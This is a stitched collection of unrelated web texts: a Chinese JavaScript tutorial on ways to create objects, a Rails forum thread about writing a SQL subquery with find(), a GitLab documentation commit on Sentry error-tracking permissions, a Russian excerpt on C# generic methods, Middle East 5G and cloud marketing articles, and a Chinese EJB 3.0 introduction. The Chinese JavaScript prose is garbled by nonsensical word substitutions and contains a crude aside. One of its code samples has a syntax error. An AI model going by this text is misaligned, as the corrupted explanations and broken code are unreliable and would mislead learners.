说了那样多,其实大旨只有二个:属性分享和单身的主宰,当你的靶子实例须求单独的属性,全体做法的精神都是在对象实例之中创造属性。若不思量太多,你大能够在Person里面一贯定义你所必要独自的属性来覆盖掉原型的属性。同理可得,使用原型承继的时候,要对于原型中的属性要非常注意,因为她俩都以牵一发而动全身的留存。 上面简单罗列下js中创制对象的各样办法,未来最常用的法子是构成方式,熟知的校友能够跳过到文章末尾点赞了。 1)原始方式 //1.土生土养方式,对象字面量情势 var person = { name: '杰克', age: 18, sayName: function () { alert(this.name); } }; //1.原始方式,Object构造函数情势 var person = new Object(); person.name = '杰克'; person.age = 18; person.sayName = function () { alert(this.name); }; 1 2 3 4 5 6 7 8 9 10 11 12 13 //1.原始模式,对象字面量方式 var person = {     name: 'Jack',     age: 18,     sayName: function () { alert(this.name); } }; //1.原始模式,Object构造函数方式 var person = new Object(); person.name = 'Jack'; person.age = 18; person.sayName = function () {     alert(this.name); }; 分明性,当我们要创立批量的person1、person2……时,每一次都要敲相当多代码,资深copypaster都吃不消!然后就有了批量生产的工厂方式。 2)工厂格局 //2.工厂形式,定义二个函数创设对象 function creatPerson (name, age) { var person = new Object(); person.name = name; person.age = age; person.sayName = function () { alert(this.name); }; return person; } 1 2 3 4 5 6 7 8 9 10 //2.工厂模式,定义一个函数创建对象 function creatPerson (name, age) {     var person = new Object();     person.name = name;     person.age = age;     person.sayName = function () {         alert(this.name);     };     return person; } 工厂情势正是批量化生产,简单调用就足以进去造人方式(图片 12做爱……)。钦命姓名年龄就能够造一群小孩子啦,解放双手。不过出于是工厂潜规则的,所以你不能够辨别这么些目的到底是哪些项目、是人依然狗傻傻分不清(instanceof 测量试验为 Object),别的每回造人时都要开创贰个单身的temp对象,代码肥壮,雅蠛蝶啊。 3)构造函数 //3.构造函数情势,为指标定义贰个构造函数 function Person (name, age) { this.name = name; this.age = age; this.sayName = function () { alert(this.name); }; } var p1 = new Person('Jack', 18); //成立多少个p1对象 Person('杰克', 18); //属性方法都给window对象,window.name='杰克',window.sayName()会输出杰克 1 2 3 4 5 6 7 8 9 10 //3.构造函数模式,为对象定义一个构造函数 function Person (name, age) {     this.name = name;     this.age = age;     this.sayName = function () {         alert(this.name);     };     } var p1 = new Person('Jack', 18); //创建一个p1对象 Person('Jack', 18);    //属性方法都给window对象,window.name='Jack',window.sayName()会输出Jack 构造函数与C++、JAVA中类的构造函数类似,易于明白,别的Person能够看作项目识别(instanceof 测量检验为 Person 、Object)。可是全数实例依然是单独的,分化实例的方法其实是例外的函数。这里把函数三个字忘了啊,把sayName充当贰个对象就好通晓了,正是说张三的 sayName 和李四的 sayName是例外的留存,但远近闻明大家希望的是公共二个 sayName 以节外省部存款和储蓄器。 4)原型格局 //4.原型情势,直接定义prototype属性 function Person () {} Person.prototype.name = 'Jack'; Person.prototype.age = 18; Person.prototype.sayName = function () { alert(this.name); }; //4.原型形式,字面量定义方式 function Person () {} Person.prototype = { name: '杰克', age: 18, sayName: function () { alert(this.name); } }; var p1 = new Person(); //name='杰克' var p2 = new Person(); //name='杰克' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 //4.原型模式,直接定义prototype属性 function Person () {} Person.prototype.name = 'Jack'; Person.prototype.age = 18; Person.prototype.sayName = function () { alert(this.name); }; //4.原型模式,字面量定义方式 function Person () {} Person.prototype = {     name: 'Jack',     age: 18,     sayName: function () { alert(this.name); } }; var p1 = new Person(); //name='Jack' var p2 = new Person(); //name='Jack' 这里须求小心的是原型属性和措施的分享,即怀有实例中都只是引用原型中的属性方法,任何二个地点时有发生的退换会挑起别的实例的成形。 5)混合方式(构造+原型) //5. 原型构造组合格局, function Person (name, age) { this.name = name; this.age = age; } Person.prototype = { hobby: ['running','football']; sayName: function () { alert(this.name); }, sayAge: function () { alert(this.age); } }; var p1 = new Person('Jack', 20); //p1:'Jack',20; __proto__: ['running','football'],sayName,sayAge var p2 = new Person('Mark', 18); //p1:'Mark',18;__proto__: ['running','football'],sayName,sayAge 1 2 3 4 5 6 7 8 9 10 11 12 13 14 //5. 原型构造组合模式, function Person (name, age) {     this.name = name;     this.age = age; } Person.prototype = {     hobby: ['running','football'];     sayName: function () { alert(this.name); },     sayAge: function () { alert(this.age); } }; var p1 = new Person('Jack', 20); //p1:'Jack',20; __proto__: ['running','football'],sayName,sayAge var p2 = new Person('Mark', 18); //p1:'Mark',18;__proto__: ['running','football'],sayName,sayAge 做法是将须要独自的习性方法放入构造函数中,而得以共享的一些则放入原型中,那样做能够最大限度节外省部存款和储蓄器而又保留对象实例的独立性。 放张美图调治下~~~码字不易,顺手点赞哈! 下后生可畏篇–闭包,再见。 图片 13 (图片出处:小周,转发请申明) 3 赞 12 收藏 1 评论 图片 14 本文由必威发布于必威-前端,转载请注明出处:每次晚上睡不着的时候总喜欢在网上找点原型链 TAG标签: Ctrl+D 将本页面保存为书签,全面了解最新资讯,方便快捷。
__label__pos
0.993685
Need translation of sql query to :find equivalent #1 I have this query, I have tried a few permutations to translate it into a :find equivalent, as a newbie this is a bit trickier than i first envisaged. heres the core sql: select resulttype from results where id in ( select result_id from outcomes o1 where o1.outcome_date = (select max(o2.outcome_date) from outcomes o2 where o2.testcase_id = o1.testcase_id and o1.testcase_id =‘1’)); can you give me a few pointers, does it require a join clause from the results table to the outcomes, or can rails do this easier? #2 Brad S. wrote: Try @result = Resulttypes( :all, :conditions => [‘id in ( select result_id from outcomes o1 where o1.outcome_date = (select max(o2.outcome_date) from outcomes o2 where o2.testcase_id = o1.testcase_id and o1.testcase_id =‘1’))’] This should work, I am doing seomthing similiar only I am say ‘NOT IN.’ #3 i cannot get the brackets right, you seem to have more brackets on the ( than on the ), when i mess around with this it just throws all kinds of errors. here is another query i am trying to write using :find Result.find(:all, :conditions => ‘resulttype = (select resulttype from results where id = 1)’) when i run this with debug <%= debug Result.find(:all, :conditions => ‘resulttype = (select resulttype from results where id = 1)’) %> i get: resulttype = ‘pass’ id = ‘1’ but when i remove debuy, i just get ####, adding a h, like this <%= h Result.find(:all, :conditions => ‘resulttype = (select resulttype from results where id = 1)’) %> i get #Result:0x395f080 can anyone point me to a good source to understand more about the :find, because its quite obscure on the rails reference. #4 On 6 Oct 2008, at 16:41, Brad S. wrote: <%= h Result.find(:all, :conditions => ‘resulttype = (select resulttype from results where id = 1)’) %> i get #Result:0x395f080 <%= %> just calls to_s on the result inside it. The to_s on an array is just the concatenation of the result of to_s on the elements of the array, and the default to_s on an AR object is unhelpful. It’s up to you do to something like <% @some_results.each do |result| date: <%= result.created_at %> value: <%= result.value %> <% end %>
__label__pos
0.996642
Connect with us 5G NETWORK Connecting the Unconnected: Bridging the Digital Divide with 5G in the Middle East Bridging the digital divide is a significant challenge for many regions, including the Middle East. The deployment of 5G technology presents a unique opportunity to address this divide and connect underserved and remote communities to the digital world. By leveraging 5G’s capabilities, Middle Eastern countries can work towards ensuring that all citizens have access to the benefits of the digital age. Here are some ways in which 5G can contribute to connecting the unconnected in the Middle East: 1. Expanding Coverage: 5G networks can reach areas where traditional wired infrastructure is not economically viable. By strategically deploying 5G base stations, Middle Eastern countries can expand network coverage to remote and underserved regions. 2. Affordability and Accessibility: To bridge the digital divide, it’s essential to make 5G services affordable and accessible to all. Middle Eastern governments and telecom providers can work together to offer cost-effective plans and devices that cater to diverse socioeconomic backgrounds. 3. Mobile Internet Access: 5G’s mobile broadband capabilities offer an opportunity to provide high-speed internet access to communities without fixed-line connectivity, enabling them to access online resources and participate in the digital economy. 4. E-Learning Opportunities: With 5G connectivity, students in remote areas can access e-learning platforms, educational resources, and virtual classrooms, improving access to quality education. 5. Telemedicine and Healthcare: 5G enables telemedicine services, allowing healthcare professionals to remotely diagnose and treat patients in underserved areas, thereby improving healthcare access and outcomes. 6. Agricultural Connectivity: 5G can facilitate the deployment of IoT solutions in agriculture, enabling precision farming and providing farmers with real-time data and insights to enhance productivity and sustainability. 7. Emergency Services: 5G’s low latency and high reliability are crucial for emergency response services in remote regions, ensuring prompt and efficient disaster management and support. 8. E-Government Services: 5G can support e-governance initiatives, making government services accessible to citizens in remote areas, improving efficiency, and promoting citizen engagement. 9. Entrepreneurship and Small Businesses: Access to 5G connectivity can empower entrepreneurs and small businesses in underserved areas, enabling them to reach larger markets and leverage digital tools for growth. 10. Digital Inclusion Programs: Governments and private organizations can collaborate on digital inclusion programs that provide training and resources to help communities leverage 5G technology effectively. 11. Smart Community Initiatives: 5G can support smart community initiatives, such as smart grids and intelligent transportation systems, enhancing the quality of life in underserved areas. 12. Public-Private Partnerships: Collaboration between governments, telecom operators, and other stakeholders is essential to drive initiatives that bridge the digital divide using 5G technology. By focusing on these approaches and emphasizing the importance of digital inclusion, Middle Eastern countries can harness the power of 5G to connect the unconnected, empowering communities and driving socioeconomic development across the region. 5G NETWORK Cloud Adoption in the Middle East: Trends and Transformations Cloud adoption in the Middle East has been steadily growing over the years, and it has undergone significant transformations, driven by several trends and factors that have shaped the region’s digital landscape. Here are some key trends and transformations related to cloud adoption in the Middle East: 1. Digital Transformation: Middle Eastern organizations, both public and private, have been increasingly adopting cloud technologies as part of their digital transformation journeys. Cloud computing enables them to modernize IT infrastructure, improve efficiency, and enhance customer experiences. 2. Government Initiatives: Several Middle Eastern governments have launched initiatives to promote cloud adoption across various sectors. These initiatives encourage public institutions and businesses to leverage cloud technologies for better service delivery and economic growth. 3. Increased Data Center Investments: With the rise in cloud adoption, there has been a corresponding increase in data center investments in the region. Data centers play a critical role in supporting cloud services and ensuring data sovereignty. 4. Growth of Cloud Service Providers: Major global cloud service providers have expanded their presence in the Middle East, establishing data centers and offering localized cloud services. This has facilitated cloud adoption by providing reliable and secure cloud solutions to local businesses. 5. Hybrid Cloud Solutions: Many organizations in the Middle East are adopting hybrid cloud solutions, combining public cloud services with private cloud or on-premises infrastructure. This approach allows businesses to balance security, compliance, and cost-effectiveness. 6. Industry-Specific Solutions: Cloud adoption in the Middle East is also driven by industry-specific solutions. For example, cloud technologies are increasingly being used in healthcare, finance, education, and logistics to address sector-specific challenges. 7. Startups and SMEs Embracing Cloud: Cloud computing has enabled startups and small and medium-sized enterprises (SMEs) to access affordable and scalable IT resources, leveling the playing field and fostering innovation. 8. Focus on Security and Compliance: As cloud adoption grows, there is a heightened focus on cybersecurity and data protection. Middle Eastern businesses are prioritizing security measures and seeking cloud providers that comply with local regulations. 9. Edge Computing Advancements: Edge computing, which brings cloud resources closer to end-users, is gaining traction in the Middle East. It enables low-latency services, critical for applications like IoT, autonomous vehicles, and real-time analytics. 10. Cloud Skills Development: There is an increasing demand for cloud-related skills in the job market. As cloud adoption expands, organizations are investing in cloud training and certifications for their IT teams. 11. Remote Workforce Enablement: Cloud technologies have played a crucial role in enabling remote work during the COVID-19 pandemic. Organizations rapidly adopted cloud-based collaboration and productivity tools to support remote workforce requirements. 12. Focus on Sustainability: Cloud providers and data center operators in the Middle East are increasingly emphasizing sustainability by adopting green energy practices and optimizing energy efficiency. Overall, cloud adoption in the Middle East is expected to continue its upward trajectory, driven by advancements in technology, government support, industry-specific use cases, and a growing awareness of the benefits of cloud computing. As organizations continue to embrace cloud technologies, the region is likely to witness further transformations in business models, service delivery, and customer experiences. Continue Reading 5G NETWORK Sustainable Smart Cities: 5G’s Role in Building Eco-Friendly Urban Centers in the Middle East 5G technology plays a crucial role in building sustainable smart cities in the Middle East, where the need for efficient resource management and environmental conservation is significant. By integrating 5G connectivity with smart city initiatives, Middle Eastern countries are creating eco-friendly urban centers that promote sustainable development and enhance the quality of life for residents. Here are some ways 5G contributes to building sustainable smart cities in the Middle East: 1. IoT-Driven Sustainability: 5G’s low latency and high capacity enable the seamless connection of a vast number of Internet of Things (IoT) devices. These devices can monitor energy usage, waste management, water consumption, air quality, and traffic flow in real-time, allowing cities to optimize resource utilization and reduce waste. 2. Energy Efficiency: 5G-powered smart grids enable precise monitoring and control of energy consumption. Cities can manage energy distribution more efficiently, integrate renewable energy sources, and reduce carbon emissions. 3. Smart Transportation: 5G facilitates intelligent transportation systems, enabling real-time traffic management and smart parking solutions. This leads to reduced congestion, lower fuel consumption, and improved air quality. 4. Waste Management: 5G-connected smart waste bins can optimize waste collection routes, minimizing unnecessary trips and reducing greenhouse gas emissions. 5. Water Management: 5G-based sensors and data analytics help in monitoring water distribution and consumption patterns, enabling more efficient water management and conservation efforts. 6. Environmental Monitoring: 5G networks support real-time environmental monitoring of air quality, temperature, humidity, and pollution levels. This data can inform policies and interventions to mitigate environmental challenges. 7. Smart Buildings: 5G-powered smart buildings can optimize energy usage, adjust lighting and temperature based on occupancy, and improve overall energy efficiency. 8. Public Services and Safety: 5G enhances public safety through real-time monitoring of critical infrastructure, efficient emergency response systems, and improved disaster management. 9. Smart Agriculture: In urban farming and vertical agriculture initiatives, 5G supports real-time monitoring and automation of agricultural processes, conserving resources and reducing food waste. 10. Citizen Engagement: 5G enables interactive citizen engagement platforms, allowing residents to actively participate in sustainability initiatives and provide valuable feedback to city authorities. 11. E-Governance and Digital Services: 5G-powered e-governance initiatives streamline government services, reducing paperwork, energy consumption, and resource usage. 12. Tourism and Green Tourism: 5G-driven smart tourism initiatives promote eco-friendly practices among tourists and support sustainable tourism development. By leveraging 5G’s capabilities, Middle Eastern cities can optimize resource management, reduce environmental impact, and foster innovation in sustainability. These efforts contribute to creating urban centers that are more resilient, energy-efficient, and environmentally conscious, making the Middle East a leader in building sustainable smart cities. Continue Reading 5G NETWORK Tourism Transformed: Enhancing the Visitor Experience in the Middle East with 5G The deployment of 5G technology in the Middle East is transforming the tourism industry and enhancing the visitor experience in the region. With its high-speed data transmission and low latency, 5G is unlocking new possibilities for tourists, enabling immersive and connected experiences that were not possible before. Here are some ways 5G is enhancing the visitor experience in the Middle East: 1. Seamless Connectivity: 5G provides tourists with seamless and reliable connectivity throughout their journeys, allowing them to stay connected, access maps, and share their experiences in real-time. 2. Augmented Reality (AR) and Virtual Reality (VR) Tourism Guides: Tourists can use AR and VR apps powered by 5G to explore historical sites, museums, and cultural landmarks with interactive and immersive guides. 3. Enhanced Navigation: 5G enables faster and more accurate GPS navigation, helping tourists navigate through unfamiliar cities and access location-based services. 4. Multimedia Content: Tourists can access high-quality multimedia content, such as 360-degree videos and augmented reality displays, to enrich their tourism experiences. 5. Real-Time Translation: 5G-powered translation services enable real-time language translation, breaking down language barriers and facilitating communication between tourists and locals. 6. Mobile Ticketing and Payments: 5G facilitates fast and secure mobile ticketing and digital payments for tourist attractions, public transportation, and restaurants, offering convenience and contactless experiences. 7. Virtual Tours: 5G enables virtual tours of popular attractions and historical sites, allowing tourists to explore and learn about destinations before their visits. 8. Interactive Exhibits: Museums and cultural institutions can create interactive exhibits and virtual reality experiences that engage and educate visitors using 5G technology. 9. Personalized Experiences: 5G-powered data analytics can help businesses offer personalized recommendations and tailored experiences based on tourists’ preferences and behaviors. 10. Smart Hotels: Hotels can leverage 5G to offer smart room experiences, such as IoT-powered devices, smart assistants, and personalized services for guests. 11. Live Streaming Events: 5G’s high bandwidth supports live streaming of events, festivals, and cultural performances, allowing tourists to virtually participate in local celebrations. 12. Tourist Safety and Security: 5G enables improved surveillance and monitoring, enhancing tourist safety and security in public spaces and crowded areas. Middle Eastern countries are actively embracing 5G to leverage its potential in transforming the tourism industry. By providing tourists with enhanced connectivity, immersive experiences, and personalized services, 5G is elevating the visitor experience in the region and positioning the Middle East as a technologically advanced and attractive tourism destination on the global stage. Continue Reading OPERATIONS CONSULTING4 weeks ago E-commerce Fulfillment Strategies Meeting Growing Demand in Middle Eastern Online Retail financial advisory4 weeks ago Retirement Planning and Pension Solutions for Middle Eastern Professionals MANAGEMENT CONSULTANT1 month ago Artificial Intelligence and Automation Transforming Middle Eastern Industries and Workforce Dynamics IT consulting1 month ago Project Management Complexities Overcoming Scope Creep and Ensuring Project Success in the Middle East IT consulting1 month ago Budget Constraints and ROI Expectations Balancing IT Investments with Business Outcomes in the Middle East HR consulting1 month ago Talent Acquisition Strategies in the Middle East Attracting and Retaining Top Talent financial advisory1 month ago Investment Landscape in the Middle East Navigating Opportunities and Risks CIOs1 month ago Navigating Digital Transformation: Middle Eastern CIOs’ Strategies and Roadblocks CIOs1 month ago Redefining Connectivity: Middle Eastern CIOs Pave the Way for 5G and IoT CIOs1 month ago Women in Arab Tech Leadership: Overcoming Gender Gaps with the Guidance of CIOs CIOs1 month ago Economic Diversification and Arab CIOs: Transforming Industries with Emerging Technologies CIOs1 month ago Arab CIOs’ Role in Healthcare Transformation: Integrating Health Tech for Improved Patient Care CIOs1 month ago AI Ethics and Arab CIOs: Navigating the Intersection of Artificial Intelligence and Values CIOs1 month ago Cybersecurity in the Arab World: CIOs Battling Growing Threats and Digital Risks CIOs1 month ago E-Government Evolution: Arab CIOs Leading Digital Transformation in Public Services CIOs1 month ago Youth Empowerment and Arab CIOs: Fostering Tech Talent in a Young Workforce CIOs1 month ago Data Sovereignty and Privacy Concerns: Arab CIOs Safeguarding Digital Assets Amidst Global Regulations CIOs1 month ago Localization vs. Globalization: Arab CIOs Balancing Tech Innovation with Cultural Sensitivity CIOs2 months ago Arab World’s Digital Divide: CIOs Tackling Technological Disparities Across the Region CIOs2 months ago Cloud Migration Dilemmas: Middle Eastern CIOs Balancing Agility and Compliance CIOs2 months ago Cultivating Tech Talent: Middle Eastern CIOs’ Struggle for Skilled IT Professionals CIOs2 months ago Cybersecurity in a Complex Landscape: How Middle Eastern CIOs Protect Digital Assets CIOs2 months ago Economic Transformation and CIO Challenges: Middle Eastern Visionaries Driving Industry 4.0 CIOs2 months ago Sustainable Tech Infrastructure: Middle Eastern CIOs Balancing Innovation and Eco-Friendly Practices CIOs2 months ago E-Government Innovations: Middle Eastern CIOs Shaping Public Services of Tomorrow STRATEGY CONSULTING2 months ago Investment Trends in the Middle East Navigating Opportunities in a Dynamic Market STRATEGY CONSULTING2 months ago Diversification Beyond Oil Strategies for Economic Growth and Resilience OPERATIONS CONSULTING2 months ago Risk Management in Construction Strategies for Mitigating Challenges in Middle Eastern Infrastructure Projects MANAGEMENT CONSULTANT2 months ago Tourism Recovery and Resilience Strategies for Rebuilding Middle Eastern Tourism Industry MANAGEMENT CONSULTANT2 months ago Inclusive Business Strategies Promoting Diversity and Equality in Middle Eastern Organizations TRENDING
__label__pos
0.700385
GitLab wird am Donnerstag, den 27. Januar, zwischen 08:00 und 12:00 Uhr wegen wichtigen Wartungsarbeiten nicht zur Verfügung stehen. Commit 4a300961 authored by Achilleas Pipinellis's avatar Achilleas Pipinellis Committed by GitLab Release Tools Bot Browse files Merge branch 'improve-error-tracking-docs' into 'master' Update docs with permissions required for error tracking See merge request gitlab-org/gitlab-ce!25208 (cherry picked from commit 1e5c83f2) 4202f259 Update docs with permissions for error tracking df00f7c5 Add line to doc listing reqd Sentry token scopes 6d40af7c Apply suggestion to doc/user/project/operations/error_tracking.md 68d92af4 Apply suggestion to doc/user/project/operations/error_tracking.md 192e3ed4 Apply suggestion to doc/user/project/operations/error_tracking.md d7e03aff Add Manage Error Tracking permission to table parent 22e1c70f ......@@ -61,6 +61,7 @@ The following table depicts the various user permission levels in a project. | Manage related issues **[STARTER]** | | ✓ | ✓ | ✓ | ✓ | | Lock issue discussions | | ✓ | ✓ | ✓ | ✓ | | Create issue from vulnerability **[ULTIMATE]** | | ✓ | ✓ | ✓ | ✓ | | View Error Tracking list | | ✓ | ✓ | ✓ | ✓ | | Lock merge request discussions | | | ✓ | ✓ | ✓ | | Create new environments | | | ✓ | ✓ | ✓ | | Stop environments | | | ✓ | ✓ | ✓ | ......@@ -101,6 +102,7 @@ The following table depicts the various user permission levels in a project. | Manage clusters | | | | ✓ | ✓ | | Manage license policy **[ULTIMATE]** | | | | ✓ | ✓ | | Edit comments (posted by any user) | | | | ✓ | ✓ | | Manage Error Tracking | | | | ✓ | ✓ | | Switch visibility level | | | | | ✓ | | Transfer project to another namespace | | | | | ✓ | | Remove project | | | | | ✓ | ...... ......@@ -14,10 +14,14 @@ You may sign up to the cloud hosted <https://sentry.io> or deploy your own [on-p ### Enabling Sentry NOTE: **Note:** You will need at least Maintainer [permissions](../../permissions.md) to enable the Sentry integration. GitLab provides an easy way to connect Sentry to your project: 1. Sign up to Sentry.io or [deploy your own](#deploying-sentry) Sentry instance. 1. [Find or generate](https://docs.sentry.io/api/auth/) a Sentry auth token for your Sentry project. Make sure to give the token at least the following scopes: `event:read` and `project:read`. 1. Navigate to your project’s **Settings > Operations** and provide the Sentry API URL and auth token. 1. Ensure that the 'Active' checkbox is set. 1. Click **Save changes** for the changes to take effect. ......@@ -25,6 +29,9 @@ GitLab provides an easy way to connect Sentry to your project: ## Error Tracking List NOTE: **Note:** You will need at least Reporter [permissions](../../permissions.md) to view the Error Tracking list. The Error Tracking list may be found at **Operations > Error Tracking** in your project's sidebar. ![Error Tracking list](img/error_tracking_list.png) Markdown is supported 0% or . You are about to add 0 people to the discussion. Proceed with caution. Finish editing this message first! Please register or to comment
__label__pos
0.606585
Пропуск параметров типа We use cookies. Read the Privacy and Cookie Policy Пропуск параметров типа При вызове обобщенных методов, подобных Swap‹T›, у ваc есть возможность не указывать параметр типа, но только в том случае, когда обобщенный метод требует указания аргументов, поскольку тогда компилятор может "выяснить" тип этих аргументов на основе вводимых параметров. Например, можно переставить два типа System.Boolean так. // Компилятор будет предполагать System.Boolean. bool b1 = true, b2 = false; Console.WriteLine("До обмена: {0}, {1}", b1, b2); Swap(ref b1, ref b2); Console.WriteLine("После обмена: {0}, {1}", b1, b2); Но если, например, у вас есть обобщённый метод с именем DisplayBaseClass‹T›, не имеющий входных параметров, как показано ниже: static void DisplayBaseClass‹T›() {  Console.WriteLine("Базовым классом {0} является: {1}.",  typeof(T), typeof(Т).BaseType); } то при вызове этого метода вы должны указать параметр типа. static void Main(string[] args) {  // Если метод не имеет параметров,  // необходимо указать параметр типа.  DisplayBaseClass‹int›();  DisplayBaseClass‹string›();  // Ошибка компиляции!  // Нет параметров? Тогда должен быть заполнитель!  DisplayBaseClass();  … } Рис. 10.1. Обобщенные методы в действии В данном случае обобщенные методы Swap‹T› и DisplayBaseClass‹T› были определены в рамках объекта приложения (т.е. в рамках типа, определяющего метод Main()). Если вы предпочтете определить эти члены в новом типе класса (MyHelperClass), то должны записать следующее. public class MyHelperClass {  public static void Swap‹T›(ref T a, ref T b) {   Console.WriteLine("Методу Swap() передано {0}", typeof(T));   T temp;   temp = a;   a = b;   b = temp;  }  public static void DisplayBaseClass‹T›() {   Console.WriteLine("Базовым классом {0} является: {1}.", typeof(T), typeof(T).BaseType);  } } Обратите внимание на то, что тип MyHelperClass сам по себе не является обобщенным, но определяет два обобщенных метода. Так или иначе, теперь, когда методы Swap‹T› и DisplayBaseClass‹T› находятся в контексте нового типа класса, при вызове их членов придется указать имя типа. MyHelperClass.Swap‹int›(ref a, ref b); Наконец, обобщенные методы не обязаны быть статическими. Если бы Swap‹T› и DisplayBaseClass‹T› были методами уровня экземпляра, нужно было бы просто создать экземпляр MyHelperClass и вызвать их из объектной переменной. MyHelperClass с = new MyHelperClass(); c.Swap‹int›(ref a, ref b);
__label__pos
0.812221
无为 无为则可为,无为则至深!   BlogJava :: 首页 :: 联系 :: 聚合  :: 管理   190 Posts :: 291 Stories :: 258 Comments :: 0 Trackbacks 作者: Lynn Munsinger 翻译:草儿 时间:2007年8月29日(My Birthday) 原文地址:http://www.oracle.com/technology/tech/java/newto/introejb.htm EJB3.0规范使开发EJB比过去更容易,可能诱惑你考虑开发第一个EJB。如果真是这种情况,那么祝贺你, 你经成功避免了在你以前EJB开发者的很多挫折,并且享受到EJB3.0开发的便利性。但是你开始开发以前, 你可能想知道EJB是什么和它们用于什么目的。本篇文章解释了EJB的基础和你如何在一个J2EE程序中使用 它们。 什么是EJB? 一个企业JavaBean (EJB)是一个可重用的,可移植的J2EE组件。 EJB由封装了业务逻辑的多个方法组成。 例如,一个EJB可以有包括一个更新客户数据库中数据的方法的业务逻辑。多个远程和本地客户端可以调用这 个方法。另外,EJB运行在一个容器里,允许开发者只关注与bean中的业务逻辑而不用考虑象事务支持,安全 性和远程对象访问等复杂和容易出错的事情。EJB以POJO或者普通旧的Java对象形式开发,开发者可以用元数 据注释来定义容器如何管理这些Bean。 EJB类型 EJB主要有三种类型:会话Bean,实体Bean和消息驱动Bean。会话Bean完成一个清晰的解耦的任务,例如 检查客户账户历史记录。实体Bean是一个代表存在于数据库中业务对象的复杂业务实体。消息驱动Bean用于 接收异步JMS消息。让我们更详细的认识这些类型。 会话Bean 会话Bean一般代表着业务流程中象"处理订单"这样的动作。会话Bean基于是否维护过度状态分为有状 态或者无状态。 无状态会话Bean 没有中间状态。它们不保持追踪一个方法调用另一个方法传递的信息。因此一个无状 态业务方法的每一次调用都独立于它的前一个调用;例如,税费计算或者转移账款。 当计算税费额的方法被 调用时,税费值被计算并返回给调用的方法,没有必要存储调用者为将来调用备用的内部状态。因为它们不 维护状态,所以这些Bean是仅仅由容器管理。当客户端请求一个无状态的Bean实例时,它可以接收来自由容器管理的无状态会话Bean实例集中的一个实例。也因为无状态会话Bean能够被共享,所以容器可以维护更少 数量的实例来为大量的客户端服务。简单地象该Bean增加元注释@Stateless 来指定一个 Java Bean作为一个 无状态会话Bean被部署和管理。 一个有状态的会话Bean维护一个跨越多个方法调用的会话状态;例如在线购物篮应用。当客户开始在线 购物时,客户的详细信息从数据库获得。相同的信息对于当客户从购物篮中增加或者移除商品等等操作时被调用的其他方法也是可访问的 。但是因为该状态不是在会话结束,系统崩溃或者网络失败时保留,所以有状 态会话Bean是暂时的。当一个客户端请求一个有状态会话Bean实例时,客户端将会得到一个会话实例,该Bean的状态只为给客户端维持。通过向方法增加元注释@Remove来告诉容器当某个方法调用结束一个有状态 会话Bean实例应该被移除。 会话Bean实例 import javax.ejb.Stateless.*; /** * 一个简单无状态会话Bean实现了CalculateEJB接口的incrementValue()方法 **/ @Stateless(name="CalculateEJB") public class CalculateEJBBean implements CalculateEJB { int value = 0; public String incrementValue() { value++; return "value incremented by 1"; } } 实体Bean 实体Bean是管理持久化数据的一个对象,潜在使用一些相关的Java对象并且可以依靠主键被唯一识别。通 过包括@Entity 元注释来指定一个类是一个实体Bean。实体Bean表示来自数据库的持久化数据,例如客户表 中的一个记录,或者一个员工表中的一个员工记录。实体Bean也可以被多个客户端共享。例如一个员工实体 能够被多个计算一个员工每年工资总额或者更新员工地址的客户端使用。实体Bean对象特定变量能够保持持 久化。实体Bean中所有没有@Transient 元注释的变量需要考虑持久化。EJB3.0的一个主要特色是创建包含使用元数据注释的对象/关系映射实体Bean的能力。例如,指定实体Bean的empId变量映射到employee表中的 EMPNO属性,象下面实例中一样用@Table(name="Employees") 注释这个表的名字和用@Column (name="EMPNO")注释empId变量。另外,EJB3.0中的一个特色是你可以很容易的在开发时测试实体 Bean,可以用Oracle Application Server Entity Test Harness在容器外部运行一个实体Bean。 实体Bean实例 import javax.persistence.*; import java.util.ArrayList; import java.util.Collection; @Entity @Table(name = "EMPLOYEES") public class Employee implements java.io.Serializable { private int empId; private String eName; private double sal; @Id @Column(name="EMPNO", primaryKey=true) public int getEmpId() { return empId; } public void setEmpId(int empId) { this.empId = empId; } public String getEname() { return eName; } public void setEname(String eName) { this.eName = eName; } public double getSal() { return sal; } public void setSal(double sal) { this.sal = sal; } public String toString() { StringBuffer buf = new StringBuffer(); buf.append("Class:") .append(this.getClass().getName()).append(" :: ").append(" empId:").append(getEmpId()).append(" ename:").append(getEname()).append("sal:").append(getSal()); return buf.toString(); } } 消息驱动Bean 驱动Bean (MDB) 提供了一个实现异步通信比直接使用Java消息服务(JMS)更容易地方法。创建MDB接 收异步JMS消息。容器处理为JMS队列和主题所要求加载处理的大部分工作。它向相关的MDB发送所有的消 息。一个MDB允许J2EE应用发送异步消息,该应用能处理这些消息。实现javax.jms. MessageListener接口和使用@MessageDriven注释该Bean来指定一个Bean是消息驱动Bean。 消息驱动Bean实例 import javax.ejb.MessageDriven; import javax.ejb.ActivationConfigProperty; import javax.ejb.Inject; import javax.jms.*; import java.util.*; import javax.ejb.TimedObject; import javax.ejb.Timer; import javax.ejb.TimerService; @MessageDriven( activationConfig = { @ActivationConfigProperty(propertyName="connectionFactoryJndiName", propertyValue="jms/TopicConnectionFactory"), @ActivationConfigProperty(propertyName="destinationName", propertyValue="jms/myTopic"), @ActivationConfigProperty(propertyName="destinationType", propertyValue="javax.jms.Topic"), @ActivationConfigProperty(propertyName="messageSelector", propertyValue="RECIPIENT = 'MDB'") } ) /** *监听可配置JMS队列或者主题和通过当一个消息发送到队列或者主题 * 调用它的onMessage()方法得到提醒的一个简单的消息驱动 *该Bean打印消息的内容 */ public class MessageLogger implements MessageListener, TimedObject { @Inject javax.ejb.MessageDrivenContext mc; public void onMessage(Message message) { System.out.println("onMessage() - " + message); try { String subject = message.getStringProperty("subject"); String inmessage = message.getStringProperty("message"); System.out.println("Message received\n\tDate: " + new java.util.Date() + "\n\tSubject: " + subject + "\n\tMessage: " + inmessage + "\n"); System.out.println("Creating Timer a single event timer"); TimerService ts = mc.getTimerService(); Timer timer = ts.createTimer(30000, subject); System.out.println("Timer created by MDB at: " + new Date(System.currentTimeMillis()) +" with info: "+subject); } catch (Throwable ex) { ex.printStackTrace(); } } public void ejbTimeout(Timer timer) { System.out.println("EJB 3.0: Timer with MDB"); System.out.println("ejbTimeout() called at: " + new Date(System.currentTimeMillis())); return; } } 使用EJB 客户端是访问Bean的应用程序。虽然没有必要保存在客户层,但是能够作为一个独立的应用,JSP, Servlet,或者另一个EJB。客户端通过Bean的远程或者本地接口访问EJB中的方法,主要取决于客户端和Bean 运行在同一个还是不同的JVM中。这些接口定义了Bean中的方法,而由Bean类实际实现这些方法。当一个 